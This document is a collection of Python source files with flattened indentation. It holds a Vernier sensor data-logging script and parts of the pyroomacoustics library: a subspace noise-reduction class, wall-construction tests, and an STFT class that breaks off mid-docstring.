gdx = gdx.gdx()
fig, ax = plt.subplots()
# CHANGE TO MATCH YOUR EXPERIMENT
time_between_readings_in_seconds = 0.5
number_of_readings = 20
digits_of_precision = 2
#gdx.open_usb() # Comment out if you are not using a USB connection.
gdx.open_ble() # Uncomment if you wish to connect via Bluetooth.
gdx.select_sensors() # You will be asked to select the sensors to be used. You can select up to three.
#gdx.select_sensors([1]) # You can also use an argument to select sensors. Separate multiple sensors with a comma, ([1,3])
# This gets the name and units of the sensors selected.
column_headers = gdx.enabled_sensor_info()
# Store the number of sensors. This variable is used in plot_graph() and print_table()
number_of_sensors=len(column_headers)
# Use the columm_headers to create a list of the units for each sensor.
# Use this list of units in the Collect loop below to add the units to the graph
unit_list = []
units = ''
for headers in column_headers:
units = str(headers[headers.find('(') : headers.find(')') +1])
unit_list.append(units)
# Save the column_headers as a string, to be used in the title of the graph
column_headers_string = str(column_headers)
column_headers_string = column_headers_string.replace("'","")
column_headers_string = column_headers_string.replace("[","")
column_headers_string = column_headers_string.replace("]","")
# Variables to store the time and readings from the sensors
sensor_times=[]
sensor_readings0=[]
sensor_readings1=[]
sensor_readings2=[]
print_table_string = []
plt.pause(1)
period_in_ms = time_between_readings_in_seconds*1000
#Start data collection at the specified rate. The period argument is in milliseconds
gdx.start(period_in_ms)
# This graphing function will be used to set up the graph and may be used during data collection to give you
# a "live" graph. Note that plotting to the graph during data collection may slow the data collection loop.
def plot_graph():
# Customize the graph See Pyplot documentation
ax.plot(sensor_times,sensor_readings0, color='r',label=column_headers[0]) #red line for sensor 1
# sensor_times and sensor_readings are variables storing the time and measurements from the data collection loop.
if (number_of_sensors>1):
ax.plot(sensor_times,sensor_readings1, color='b',label=column_headers[1]) #blue line for sensor 2
if (number_of_sensors>2):
ax.plot(sensor_times,sensor_readings2, color='k',label=column_headers[2]) #black line for sensor 3
plt.ylabel(column_headers_string) #name and units of the sensor selected#
plt.xlabel('Time(s)')
plt.grid(True) #This controls whether there is a grid on the graph
plt.pause (0.05) # display the graph briefly, as the readings are taken
def print_table():
print ("Data Table:")
print ('Time (s) ',column_headers_string) #label the data table that will be printed on the Python Shell
# The print_table_string is a list of strings. Each element in the list contains the time and readings.
# This variable is created in the Data Collection loop.
for string in print_table_string:
print(string)
# Data Collection:
collection_complete=False
while not collection_complete:
try:
time = 0
print ('Collecting Data...')
# Print the column headers, starting with Time(s)
print('Time(s), ' + column_headers_string)
for i in range(0,number_of_readings):
# Create a list of times to be used in the graph and data table.
sensor_times.append(time)
# This is where we are reading the list of measurements from the sensors.
measurements=gdx.read()
if measurements == None:
break
# Store each sensor's measurement in a list to be used in plot_graph() and print_table()
d = 0
data_string = ''
title_string =''
for data in measurements:
if d == 0:
sensor_readings0.append(data)
if d == 1:
sensor_readings1.append(data)
if d == 2:
sensor_readings2.append(data)
# Build a string for printing to the terminal and to be used as the title of the graph
round_data = str(round(data,digits_of_precision))
data_string = data_string + round_data + ' '
title_string = title_string + round_data + unit_list[d] + ' '
d += 1
# Create a list for the print_table() function. Only used for fast data collection
if time_between_readings_in_seconds<=0.4:
print_table_string.append(str(round(time,2)) + ' ' + data_string)
# For slower data collection, print the data to the terminal and the graph
if time_between_readings_in_seconds>0.4:
# Print the time and the data to the terminal
print(str(round(time,2)) + ' '+ data_string)
# If the last reading is finished update the graph's title
if i >=number_of_readings-1:
plt.title(column_headers_string +' vs '+'Time (s)')
# If collection is in process, use the data as the graph's title, for real-time updates
else:
plt.title(title_string)
# Call the plot_graph() function to update the graph with the new data set.
plot_graph()
# Update the time variable with the new time for the next data point
time = time+time_between_readings_in_seconds
# The data collection loop is finished
collection_complete=True
print ('data collection complete')
print ('Number of readings: ',i+1)
print ('Time between readings: ',time_between_readings_in_seconds, " s")
print ('Total time for data collection ', time, ' s')
# Stop sensor readings and disconnect the device.
gdx.stop()
gdx.close()
# For fast collection we did not print to the graph during data collection. Now that all data
# have been collected, send the data to the print_table() and plot_graph() function.
if time_between_readings_in_seconds<=0.4:
print_table()
plt.title(column_headers[0]+' vs '+'Time (s)') #put a title on the top of graph
plot_graph()
except KeyboardInterrupt:
collection_complete=True
gdx.stop() #Stop sensor readings
gdx.close()#Disconnect the device
print ('data collection stopped by keypress')
print ('Number of readings: ',i+1)
# Command to leave the graph window open when the program ends.
plt.show()
``` |
{
"source": "4bian/pyroomacoustics",
"score": 2
} |
#### File: pyroomacoustics/denoise/subspace.py
```python
import numpy as np
class Subspace(object):
"""
A class for performing **single channel** noise reduction in the time domain
via the subspace approach. This implementation is based off of the approach
presented in:
<NAME> and <NAME>, *A signal subspace approach for speech enhancement,*
IEEE Transactions on Speech and Audio Processing, vol. 3, no. 4, pp. 251-266, Jul 1995.
Moreover, an adaptation of the subspace approach is implemented here, as
presented in:
<NAME> and <NAME>, *A subspace approach for enhancing speech corrupted by colored noise,*
IEEE Signal Processing Letters, vol. 9, no. 7, pp. 204-206, Jul 2002.
Namely, an eigendecomposition is performed on the matrix:
.. math::
\Sigma = R_n^{-1} R_y - I,
where :math:`R_n` is the noise covariance matrix, :math:`R_y` is the
covariance matrix of the input noisy signal, and :math:`I` is the identity
matrix. The covariance matrices are estimated from past samples; the number
of past samples/frames used for estimation can be set with the parameters
`lookback` and `skip`. A simple energy threshold (`thresh` parameter) is
used to identify noisy frames.
The eigenvectors corresponding to the positive eigenvalues of
:math:`\Sigma` are used to create a linear operator :math:`H_{opt}` in order
to enhance the noisy input signal :math:`\mathbf{y}`:
.. math::
\mathbf{\hat{x}} = H_{opt} \cdot \mathbf{y}.
The length of :math:`\mathbf{y}` is specified by the parameter `frame_len`;
:math:`50\%` overlap and add with a Hanning window is used to reconstruct
the output. A great summary of the approach can be found in the paper by
<NAME> and <NAME> under Section III, B.
Adjusting the factor :math:`\\mu` presents a trade-off between noise
suppression and distortion.
Below is an example of how to use this class to emulate a streaming/online
input. A full example can be found `here <https://github.com/LCAV/pyroomacoustics/blob/master/examples/noise_reduction_subspace.py>`_.
Depending on your choice for `frame_len`, `lookback`, and `skip`, the
approach may not be suitable for real-time processing.
::
# initialize Subspace object
scnr = Subspace(frame_len=256, mu=10, lookback=10, skip=2, thresh=0.01)
# apply block-by-block
for n in range(num_blocks):
denoised_signal = scnr.apply(noisy_input)
There also exists a "one-shot" function.
::
# import or create `noisy_signal`
denoised_signal = apply_subspace(noisy_signal, frame_len=256, mu=10,
lookback=10, skip=2, thresh=0.01)
Parameters
----------
frame_len : int
Frame length in samples. Note that large values (above 256) will make
the eigendecompositions very expensive.
mu : float
Enhancement factor, larger values suppress more noise but could lead
to more distortion.
lookback : int
How many frames to look back for covariance matrix estimation.
skip : int
How many samples to skip when estimating the covariance matrices with
past samples. `skip=1` will use all possible frames in the estimation.
thresh : float
Threshold to distinguish between (signal+noise) and (noise) frames. A
high value will classify more frames as noise but might remove desired
signal!
data_type : 'float32' or 'float64'
Data type to use in the enhancement procedure. Default is 'float32'.
"""
def __init__(
self,
frame_len=256,
mu=10,
lookback=10,
skip=2,
thresh=0.01,
data_type="float32",
):
if frame_len % 2:
raise ValueError(
"Frame length should be even as this method " "performs 50% overlap."
)
if data_type is "float64":
data_type = np.float64
else:
data_type = np.float32
self.frame_len = frame_len
self.mu = mu
self.dtype = data_type
self.hop = frame_len // 2
self.prev_samples = np.zeros(self.hop, dtype=data_type)
self.prev_output = np.zeros(self.hop, dtype=data_type)
self.current_out = np.zeros(self.hop, dtype=data_type)
self.win = np.hanning(frame_len).astype(data_type)
# enhancement filter parameter
self.h_opt = np.zeros((frame_len, frame_len), dtype=data_type)
# estimate (signal+noise) and noise covariance matrices
self.thresh = thresh
self.n_samples = self.hop * lookback + frame_len
self.input_samples = np.zeros(self.n_samples, dtype=data_type)
self.skip = skip
self.n_frames = lookback * (self.hop // skip)
self.n_noise_frames = np.ones(lookback) * (self.hop // skip)
self.cov_sn = np.zeros((frame_len, frame_len), dtype=data_type)
self._cov_sn = np.zeros((lookback, frame_len, frame_len), dtype=data_type)
self.cov_n = np.zeros((frame_len, frame_len), dtype=data_type)
self._cov_n = np.zeros((lookback, frame_len, frame_len), dtype=data_type)
def apply(self, new_samples):
"""
Parameters
----------
new_samples: numpy array
New array of samples of length `self.hop` in the time domain.
Returns
-------
numpy array
Denoised samples.
"""
if len(new_samples) != self.hop:
raise ValueError(
"Expected {} samples, got {}.".format(self.hop, len(new_samples))
)
new_samples = new_samples.astype(self.dtype)
# form input frame, 50% overlap
input_frame = np.r_[self.prev_samples, new_samples]
# update covariance matrix estimates
self.update_cov_matrices(new_samples)
# compute filter to project to signal subspace
self.compute_signal_projection()
# compute output
denoised_out = self.win * np.dot(self.h_opt, input_frame)
# update
self.prev_samples[:] = new_samples
self.current_out[:] = self.prev_output + denoised_out[: self.hop]
self.prev_output[:] = denoised_out[self.hop :]
return self.current_out
def compute_signal_projection(self):
sigma = np.linalg.lstsq(self.cov_n, self.cov_sn, rcond=None)[0] - np.eye(
self.frame_len
)
eigenvals, eigenvecs = np.linalg.eig(sigma)
n_pos = sum(eigenvals > 0)
order = np.argsort(eigenvals, axis=-1)[::-1]
pos_eigenvals = np.real(eigenvals[order][:n_pos])
q1 = np.zeros((self.frame_len, self.frame_len))
for w in range(0, n_pos):
q1[w, w] = pos_eigenvals[w] / (pos_eigenvals[w] + self.mu)
v_t = np.transpose(-eigenvecs[:, order])
self.h_opt[:] = np.real(np.dot(np.dot(np.linalg.pinv(v_t), q1), v_t))
# self.h_opt = np.dot(np.linalg.lstsq(v_t, q1, rcond=None)[0], v_t)
def update_cov_matrices(self, new_samples):
# remove cov of old samples
self.cov_sn *= self.n_frames
self.cov_sn -= self._cov_sn[0]
old_cov_n = self.cov_n.copy()
self.cov_n *= sum(self.n_noise_frames)
self.cov_n -= self._cov_n[0]
# update samples
self.input_samples = np.roll(self.input_samples, -self.hop)
self.input_samples[-self.hop :] = new_samples
# update cov matrices
self._cov_sn = np.roll(self._cov_sn, -1, axis=0)
self._cov_sn[-1, :, :] = np.zeros((self.frame_len, self.frame_len))
self._cov_n = np.roll(self._cov_n, -1, axis=0)
self._cov_n[-1, :, :] = np.zeros((self.frame_len, self.frame_len))
self.n_noise_frames = np.roll(self.n_noise_frames, -1)
self.n_noise_frames[-1] = 0
for i in range(0, self.hop, self.skip):
a = self.n_samples - self.hop - self.frame_len + i
b = a + self.frame_len
_noisy_signal = self.input_samples[a:b]
new_cov = np.outer(_noisy_signal, _noisy_signal).astype(self.dtype)
# (signal+noise) cov
self._cov_sn[-1] += new_cov
# noise cov
energy = np.std(_noisy_signal) ** 2
if energy < self.thresh:
self._cov_n[-1] += new_cov
self.n_noise_frames[-1] += 1
# if no new noise frames, use previous
if self.n_noise_frames[-1] == 0:
self._cov_n[-1] = old_cov_n
self.n_noise_frames[-1] = 1
# compute average for new estimate
self.cov_sn = (self.cov_sn + self._cov_sn[-1]) / self.n_frames
self.cov_n = (self.cov_n + self._cov_n[-1]) / sum(self.n_noise_frames)
def apply_subspace(
noisy_signal,
frame_len=256,
mu=10,
lookback=10,
skip=2,
thresh=0.01,
data_type=np.float32,
):
"""
One-shot function to apply subspace denoising approach.
Parameters
----------
noisy_signal : numpy array
Real signal in time domain.
frame_len : int
Frame length in samples. Note that large values (above 256) will make
the eigendecompositions very expensive. 50% overlap is used with
hanning window.
mu : float
Enhancement factor, larger values suppress more noise but could lead
to more distortion.
lookback : int
How many frames to look back for covariance matrix estimation.
skip : int
How many samples to skip when estimating the covariance matrices with
past samples. `skip=1` will use all possible frames in the estimation.
thresh : float
Threshold to distinguish between (signal+noise) and (noise) frames. A
high value will classify more frames as noise and might even remove
desired signal!
data_type : 'float32' or 'float64'
Data type to use in the enhancement procedure. Default is 'float32'.
Returns
-------
numpy array
Enhanced/denoised signal.
"""
scnr = Subspace(frame_len, mu, lookback, skip, thresh, data_type)
processed_audio = np.zeros(noisy_signal.shape)
n = 0
hop = frame_len // 2
while noisy_signal.shape[0] - n >= hop:
processed_audio[n : n + hop,] = scnr.apply(noisy_signal[n : n + hop])
# update step
n += hop
return processed_audio
```
#### File: tests/tests_libroom/test_wall_construct.py
```python
from __future__ import division
import numpy as np
import pyroomacoustics as pra
eps = 1e-6
# The vertices of the wall are assumed to turn counter-clockwise around the
# normal of the wall
# A very simple wall
walls = [
{
"corners": np.array(
[[0.0, 1.0, 1.0, 0.0], [0.0, 0.0, 1.0, 1.0], [0.0, 0.0, 0.0, 0.0],]
),
"area": 1,
"absorption": [0.2],
"scattering": [0.1],
},
{
"corners": np.array([[-1, 1, 1], [1, -1, 1], [1, 1, -1],]),
"area": 3.4641016151377557, # this is an equilateral triangle with side sqrt(8)
"absorption": [0.2],
"scattering": [0.1],
},
]
def test_wall_3d_construct_0():
"""Tests construction of a wall"""
w_info = walls[0]
wall = pra.wall_factory(w_info["corners"], [0.2], [0.1])
return wall
def test_wall_3d_construct_1():
"""Tests construction of a wall"""
w_info = walls[1]
wall = pra.wall_factory(w_info["corners"], [0.2], [0.1])
return wall
def test_wall_3d_area_0():
"""Tests the area computation"""
w_info = walls[0]
wall = pra.wall_factory(
w_info["corners"], w_info["absorption"], w_info["scattering"]
)
err = abs(wall.area() - w_info["area"])
assert err < 1, "The error is {}".format(err)
def test_wall_3d_area_1():
"""Tests the area computation"""
w_info = walls[1]
wall = pra.wall_factory(
w_info["corners"], w_info["absorption"], w_info["scattering"]
)
err = abs(wall.area() - w_info["area"])
assert err < 1, "The error is {}".format(err)
def test_wall_3d_normal_0():
"""Tests direction of normal wrt to point arrangement"""
w_info = walls[0]
wall1 = pra.wall_factory(w_info["corners"], [0.2], [0.1])
# the same wall with normal pointing the other way
wall2 = pra.wall_factory(w_info["corners"][:, ::-1], [0.2], [0.1])
err = np.linalg.norm(wall1.normal + wall2.normal)
assert err < eps, "The error is {}".format(err)
def test_wall_3d_normal_1():
"""Tests direction of normal wrt to point arrangement"""
w_info = walls[1]
wall1 = pra.wall_factory(w_info["corners"], [0.2], [0.1])
# the same wall with normal pointing the other way
wall2 = pra.wall_factory(w_info["corners"][:, ::-1], [0.2], [0.1])
err = np.linalg.norm(wall1.normal + wall2.normal)
assert err < eps, "The error is {}".format(err)
if __name__ == "__main__":
wall0 = test_wall_3d_construct_0()
test_wall_3d_normal_0()
test_wall_3d_area_0()
wall1 = test_wall_3d_construct_1()
test_wall_3d_normal_1()
test_wall_3d_area_1()
```
#### File: pyroomacoustics/transform/stft.py
```python
from __future__ import division
import numpy as np
from numpy.lib.stride_tricks import as_strided as _as_strided
from .dft import DFT
class STFT(object):
"""
A class for STFT processing.
Parameters
-----------
N : int
number of samples per frame
hop : int
hop size
analysis_window : numpy array
window applied to block before analysis
synthesis_window : numpy array
window applied to the block before synthesis
channels : int
number of signals
transform : str, optional
which FFT package to use: 'numpy' (default), 'pyfftw', or 'mkl'
streaming : bool, optional
whether (True, default) or not (False) to "stitch" samples between
repeated calls of 'analysis' and 'synthesis' if we are receiving a
continuous stream of samples.
num_frames : int, optional
Number of frames to be processed. If set, this will be strictly enforced
as the STFT block will allocate memory accordingly. If not set, there
will be no check on the number of frames sent to
analysis/process/synthesis
NOTE:
1) num_frames = 0, corresponds to a "real-time" case in which each
input block corresponds to [hop] samples.
2) num_frames > 0, requires [(num_frames-1)*hop + N] samples as the
last frame must contain [N] samples.
precision : string, np.float32, np.float64, np.complex64, np.complex128, optional
How many precision bits to use for the input.
If 'single'/np.float32/np.complex64, 32 bits for real inputs or 64 for complex spectrum.
Otherwise, cast to 64 bits for real inputs or 128 for complex spectrum (default).
"""
def __init__(
self,
N,
hop=None,
analysis_window=None,
synthesis_window=None,
channels=1,
transform="numpy",
streaming=True,
precision="double",
**kwargs
):
# initialize parameters
self.num_samples = N # number of samples per frame
self.num_channels = channels # number of channels
self.mono = True if self.num_channels == 1 else False
if hop is not None: # hop size --> number of input samples
self.hop = hop
else:
self.hop = self.num_samples
if (
precision == np.float32
or precision == np.complex64
or precision == "single"
):
self.time_dtype = np.float32
self.freq_dtype = np.complex64
else:
self.time_dtype = np.float64
self.freq_dtype = np.complex128
# analysis and synthesis window
self.analysis_window = analysis_window
self.synthesis_window = synthesis_window
# prepare variables for DFT object
self.transform = transform
self.nfft = self.num_samples # differ when there is zero-padding
self.nbin = self.nfft // 2 + 1
# initialize filter + zero padding --> use set_filter
self.zf = 0
self.zb = 0
self.H = None # filter frequency spectrum
self.H_multi = None # for multiple frames
# check keywords
if "num_frames" in kwargs.keys():
self.fixed_input = True
num_frames = kwargs["num_frames"]
if num_frames < 0:
raise ValueError("num_frames must be non-negative!")
self.num_frames = num_frames
else:
self.fixed_input = False
self.num_frames = 0
# allocate all the required buffers
self.streaming = streaming
self._make_buffers()
def _make_buffers(self):
"""
Allocate memory for internal buffers according to FFT size, number of
channels, and number of frames.
"""
# state variables
self.n_state = self.num_samples - self.hop
self.n_state_out = self.nfft - self.hop
# make DFT object
self.dft = DFT(
nfft=self.nfft,
D=self.num_channels,
analysis_window=self.analysis_window,
synthesis_window=self.synthesis_window,
transform=self.transform,
)
"""
1D array for num_channels=1 as the FFTW package can only take 1D array
for 1D DFT.
"""
if self.mono:
# input buffer
self.fft_in_buffer = np.zeros(self.nfft, dtype=self.time_dtype)
# state buffer
self.x_p = np.zeros(self.n_state, dtype=self.time_dtype)
# prev reconstructed samples
self.y_p = np.zeros(self.n_state_out, dtype=self.time_dtype)
# output samples
self.out = np.zeros(self.hop, dtype=self.time_dtype)
else:
# input buffer
self.fft_in_buffer = np.zeros(
(self.nfft, self.num_channels), dtype=self.time_dtype
)
# state buffer
self.x_p = np.zeros(
(self.n_state, self.num_channels), dtype=self.time_dtype
)
# prev reconstructed samples
self.y_p = np.zeros(
(self.n_state_out, self.num_channels), dtype=self.time_dtype
)
# output samples
self.out = np.zeros((self.hop, self.num_channels), dtype=self.time_dtype)
# useful views on the input buffer
self.fft_in_state = self.fft_in_buffer[
self.zf : self.zf + self.n_state,
]
self.fresh_samples = self.fft_in_buffer[
self.zf + self.n_state : self.zf + self.n_state + self.hop,
]
self.old_samples = self.fft_in_buffer[
self.zf + self.hop : self.zf + self.hop + self.n_state,
]
# if fixed number of frames to process
if self.fixed_input:
if self.num_frames == 0:
if self.mono:
self.X = np.zeros(self.nbin, dtype=self.freq_dtype)
else:
self.X = np.zeros(
(self.nbin, self.num_channels), dtype=self.freq_dtype
)
else:
self.X = np.squeeze(
np.zeros(
(self.num_frames, self.nbin, self.num_channels),
dtype=self.freq_dtype,
)
)
# DFT object for multiple frames
self.dft_frames = DFT(
nfft=self.nfft,
D=self.num_frames,
analysis_window=self.analysis_window,
synthesis_window=self.synthesis_window,
transform=self.transform,
)
else: # we will allocate these on-the-fly
self.X = None
self.dft_frames = None
def reset(self):
"""
Reset state variables. Necessary after changing or setting the filter
or zero padding.
"""
if self.mono:
self.fft_in_buffer[:] = 0.0
self.x_p[:] = 0.0
self.y_p[:] = 0.0
self.X[:] = 0.0
self.out[:] = 0.0
else:
self.fft_in_buffer[:, :] = 0.0
self.x_p[:, :] = 0.0
self.y_p[:, :] = 0.0
self.X[:, :] = 0.0
self.out[:, :] = 0.0
def zero_pad_front(self, zf):
"""
Set zero-padding at beginning of frame.
"""
self.zf = zf
self.nfft = self.num_samples + self.zb + self.zf
self.nbin = self.nfft // 2 + 1
if self.analysis_window is not None:
self.analysis_window = np.concatenate((np.zeros(zf), self.analysis_window))
if self.synthesis_window is not None:
self.synthesis_window = np.concatenate(
(np.zeros(zf), self.synthesis_window)
)
# We need to reallocate buffers after changing zero padding
self._make_buffers()
def zero_pad_back(self, zb):
"""
Set zero-padding at end of frame.
"""
self.zb = zb
self.nfft = self.num_samples + self.zb + self.zf
self.nbin = self.nfft // 2 + 1
if self.analysis_window is not None:
self.analysis_window = np.concatenate((self.analysis_window, np.zeros(zb)))
if self.synthesis_window is not None:
self.synthesis_window = np.concatenate(
(self.synthesis_window, np.zeros(zb))
)
# We need to reallocate buffers after changing zero padding
self._make_buffers()
def set_filter(self, coeff, zb=None, zf=None, freq=False):
"""
Set time-domain FIR filter with appropriate zero-padding.
Frequency spectrum of the filter is computed and set for the object.
There is also a check for sufficient zero-padding.
Parameters
-----------
coeff : numpy array
Filter in time domain.
zb : int
Amount of zero-padding added to back/end of frame.
zf : int
Amount of zero-padding added to front/beginning of frame.
freq : bool
Whether or not given coefficients (coeff) are in the frequency
domain.
"""
# apply zero-padding
if zb is not None:
self.zero_pad_back(zb)
if zf is not None:
self.zero_pad_front(zf)
if not freq:
# compute filter magnitude and phase spectrum
self.H = self.freq_dtype(np.fft.rfft(coeff, self.nfft, axis=0))
# check for sufficient zero-padding
if self.nfft < (self.num_samples + len(coeff) - 1):
raise ValueError(
"Insufficient zero-padding for chosen number "
"of samples per frame (L) and filter length "
"(h). Require zero-padding such that new "
"length is at least (L+h-1)."
)
else:
if len(coeff) != self.nbin:
raise ValueError("Invalid length for frequency domain " "coefficients.")
self.H = coeff
# prepare filter if fixed input case
if self.fixed_input:
if self.num_channels == 1:
self.H_multi = np.tile(self.H, (self.num_frames, 1))
else:
self.H_multi = np.tile(self.H, (self.num_frames, 1, 1))
def analysis(self, x):
"""
Parameters
-----------
x : 2D numpy array, [samples, channels]
Time-domain signal.
"""
# ----check correct number of channels
x_shape = x.shape
if not self.mono:
if len(x_shape) < 1: # received mono
raise ValueError(
"Received 1-channel signal. Expecting %d "
"channels." % self.num_channels
)
if x_shape[1] != self.num_channels:
raise ValueError(
"Incorrect number of channels. Received %d, "
"expecting %d." % (x_shape[1], self.num_channels)
)
else: # expecting mono
if len(x_shape) > 1: # received multi-channel
raise ValueError(
"Received %d channels; expecting 1D mono " "signal." % x_shape[1]
)
# ----check number of frames
if self.streaming: # need integer multiple of hops
if self.fixed_input:
if x_shape[0] != self.num_frames * self.hop:
raise ValueError(
"Input must be of length %d; received %d "
"samples." % (self.num_frames * self.hop, x_shape[0])
)
else:
self.num_frames = int(np.ceil(x_shape[0] / self.hop))
extra_samples = (self.num_frames * self.hop) - x_shape[0]
if extra_samples:
if self.mono:
x = np.concatenate((x, np.zeros(extra_samples)))
else:
x = np.concatenate(
(x, np.zeros((extra_samples, self.num_channels)))
)
# non-streaming
# need at least num_samples for last frame
# e.g.[hop|hop|...|hop|num_samples]
else:
if self.fixed_input:
if x_shape[0] != (self.hop * (self.num_frames - 1) + self.num_samples):
raise ValueError(
"Input must be of length %d; received %d "
"samples."
% (
(self.hop * (self.num_frames - 1) + self.num_samples),
x_shape[0],
)
)
else:
if x_shape[0] < self.num_samples:
# raise ValueError('Not enough samples. Received %d; need \
# at least %d.' % (x_shape[0],self.num_samples))
extra_samples = self.num_samples - x_shape[0]
if self.mono:
x = np.concatenate((x, np.zeros(extra_samples)))
else:
x = np.concatenate(
(x, np.zeros((extra_samples, self.num_channels)))
)
self.num_frames = 1
else:
# calculate num_frames and append zeros if necessary
self.num_frames = int(
np.ceil((x_shape[0] - self.num_samples) / self.hop) + 1
)
extra_samples = (
(self.num_frames - 1) * self.hop + self.num_samples
) - x_shape[0]
if extra_samples:
if self.mono:
x = np.concatenate((x, np.zeros(extra_samples)))
else:
x = np.concatenate(
(x, np.zeros((extra_samples, self.num_channels)))
)
# ----allocate memory if necessary
if not self.fixed_input:
self.X = np.squeeze(
np.zeros(
(self.num_frames, self.nbin, self.num_channels),
dtype=self.freq_dtype,
)
)
self.dft_frames = DFT(
nfft=self.nfft,
D=self.num_frames,
analysis_window=self.analysis_window,
synthesis_window=self.synthesis_window,
transform=self.transform,
)
# ----use appropriate function
if self.streaming:
self._analysis_streaming(x)
else:
self.reset()
self._analysis_non_streaming(x)
return self.X
def _analysis_single(self, x_n):
"""
Transform new samples to STFT domain for analysis.
Parameters
-----------
x_n : numpy array
[self.hop] new samples
"""
# correct input size check in: dft.analysis()
self.fresh_samples[:,] = x_n[
:,
] # introduce new samples
self.x_p[:,] = self.old_samples # save next state
# apply DFT to current frame
self.X[:] = self.dft.analysis(self.fft_in_buffer)
# shift backwards in the buffer the state
self.fft_in_state[:,] = self.x_p[
:,
]
def _analysis_streaming(self, x):
"""
STFT analysis for streaming case in which we expect
[num_frames*hop] samples
"""
if self.num_frames == 1:
self._analysis_single(x)
else:
n = 0
for k in range(self.num_frames):
# introduce new samples
self.fresh_samples[:,] = x[
n : n + self.hop,
]
# save next state
self.x_p[:,] = self.old_samples
# apply DFT to current frame
self.X[k,] = self.dft.analysis(self.fft_in_buffer)
# shift backwards in the buffer the state
self.fft_in_state[:,] = self.x_p[
:,
]
n += self.hop
def _analysis_non_streaming(self, x):
"""
STFT analysis for non-streaming case in which we expect
[(num_frames-1)*hop+num_samples] samples
"""
## ----- STRIDED WAY
new_strides = (x.strides[0], self.hop * x.strides[0])
new_shape = (self.num_samples, self.num_frames)
if not self.mono:
for c in range(self.num_channels):
y = _as_strided(x[:, c], shape=new_shape, strides=new_strides)
y = np.concatenate(
(
np.zeros((self.zf, self.num_frames)),
y,
np.zeros((self.zb, self.num_frames)),
)
)
if self.num_frames == 1:
self.X[:, c] = self.dft_frames.analysis(y[:, 0]).T
else:
self.X[:, :, c] = self.dft_frames.analysis(y).T
else:
y = _as_strided(x, shape=new_shape, strides=new_strides)
y = np.concatenate(
(
np.zeros((self.zf, self.num_frames)),
y,
np.zeros((self.zb, self.num_frames)),
)
)
if self.num_frames == 1:
self.X[:] = self.dft_frames.analysis(y[:, 0]).T
else:
self.X[:] = self.dft_frames.analysis(y).T
def _check_input_frequency_dimensions(self, X):
"""
Ensure that given frequency data is valid, i.e. number of channels and
number of frequency bins.
If fixed_input=True, ensure expected number of frames. Otherwise, infer
from given data.
Axis order of X should be : [frames, frequencies, channels]
"""
# check number of frames and correct number of bins
X_shape = X.shape
if len(X_shape) == 1: # single channel, one frame
num_frames = 1
elif len(X_shape) == 2 and not self.mono: # multi-channel, one frame
num_frames = 1
elif len(X_shape) == 2 and self.mono: # single channel, multiple frames
num_frames = X_shape[0]
elif len(X_shape) == 3 and not self.mono: # multi-channel, multiple frames
num_frames = X_shape[0]
else:
raise ValueError("Invalid input shape.")
# check number of bins
if num_frames == 1:
if X_shape[0] != self.nbin:
raise ValueError(
"Invalid number of frequency bins! Expecting "
"%d, got %d." % (self.nbin, X_shape[0])
)
else:
if X_shape[1] != self.nbin:
raise ValueError(
"Invalid number of frequency bins! Expecting"
" %d, got %d." % (self.nbin, X_shape[1])
)
# check number of frames, if fixed input size
if self.fixed_input:
if num_frames != self.num_frames:
raise ValueError("Input must have %d frames!" % self.num_frames)
self.X[:] = X # reset if size is alright
else:
self.X = X
self.num_frames = num_frames
return self.X
def process(self, X=None):
"""
Parameters
-----------
X : numpy array
X can take on multiple shapes:
1) (N,) if it is single channel and only one frame
2) (N,D) if it is multi-channel and only one frame
3) (F,N) if it is single channel but multiple frames
4) (F,N,D) if it is multi-channel and multiple frames
Returns
-----------
x_r : numpy array
Reconstructed time-domain signal.
"""
# check that there is filter
if self.H is None:
return
if X is not None:
self._check_input_frequency_dimensions(X)
# use appropriate function
if self.num_frames == 1:
self._process_single()
elif self.num_frames > 1:
self._process_multiple()
return self.X
def _process_single(self):
np.multiply(self.X, self.H, self.X)
def _process_multiple(self):
if not self.fixed_input:
if self.mono:
self.H_multi = np.tile(self.H, (self.num_frames, 1))
else:
self.H_multi = np.tile(self.H, (self.num_frames, 1, 1))
np.multiply(self.X, self.H_multi, self.X)
def synthesis(self, X=None):
"""
Parameters
-----------
X : numpy array of frequency content
X can take on multiple shapes:
1) (N,) if it is single channel and only one frame
2) (N,D) if it is multi-channel and only one frame
3) (F,N) if it is single channel but multiple frames
4) (F,N,D) if it is multi-channel and multiple frames
where:
- F is the number of frames
- N is the number of frequency bins
- D is the number of channels
Returns
-----------
x_r : numpy array
Reconstructed time-domain signal.
"""
if X is not None:
self._check_input_frequency_dimensions(X)
# use appropriate function
if self.num_frames == 1:
return self._synthesis_single()
elif self.num_frames > 1:
return self._synthesis_multiple()
def _synthesis_single(self):
"""
Transform to time domain and reconstruct output with overlap-and-add.
Returns
-------
numpy array
Reconstructed array of samples of length <self.hop>.
"""
# apply IDFT to current frame
self.dft.synthesis(self.X)
return self._overlap_and_add()
def _synthesis_multiple(self):
"""
Apply STFT analysis to multiple frames.
Returns
-----------
x_r : numpy array
Recovered signal.
"""
# synthesis + overlap and add
if not self.mono:
x_r = np.zeros(
(self.num_frames * self.hop, self.num_channels), dtype=self.time_dtype
)
n = 0
for f in range(self.num_frames):
# apply IDFT to current frame and reconstruct output
x_r[n : n + self.hop,] = self._overlap_and_add(
self.dft.synthesis(self.X[f, :, :])
)
n += self.hop
else:
x_r = np.zeros(self.num_frames * self.hop, dtype=self.time_dtype)
# treat number of frames as the multiple channels for DFT
if not self.fixed_input:
self.dft_frames = DFT(
nfft=self.nfft,
D=self.num_frames,
analysis_window=self.analysis_window,
synthesis_window=self.synthesis_window,
transform=self.transform,
)
# back to time domain
mx = self.dft_frames.synthesis(self.X.T)
# overlap and add
n = 0
for f in range(self.num_frames):
x_r[n : n + self.hop,] = self._overlap_and_add(mx[:, f])
n += self.hop
return x_r
def _overlap_and_add(self, x=None):
if x is None:
x = self.dft.x
self.out[:,] = x[
0 : self.hop,
] # fresh output samples
# add state from previous frames when overlap is used
if self.n_state_out > 0:
m = np.minimum(self.hop, self.n_state_out)
self.out[:m,] += self.y_p[
:m,
]
# update state variables
self.y_p[: -self.hop,] = self.y_p[
self.hop :,
] # shift out left
self.y_p[-self.hop :,] = 0.0
self.y_p[:,] += x[
-self.n_state_out :,
]
return self.out
" ---------------------------------------------------------------------------- "
" --------------- One-shot functions to avoid creating object. --------------- "
" ---------------------------------------------------------------------------- "
# Authors: <NAME>, <NAME>, <NAME>
def analysis(x, L, hop, win=None, zp_back=0, zp_front=0):
"""
Convenience function for one-shot STFT
Parameters
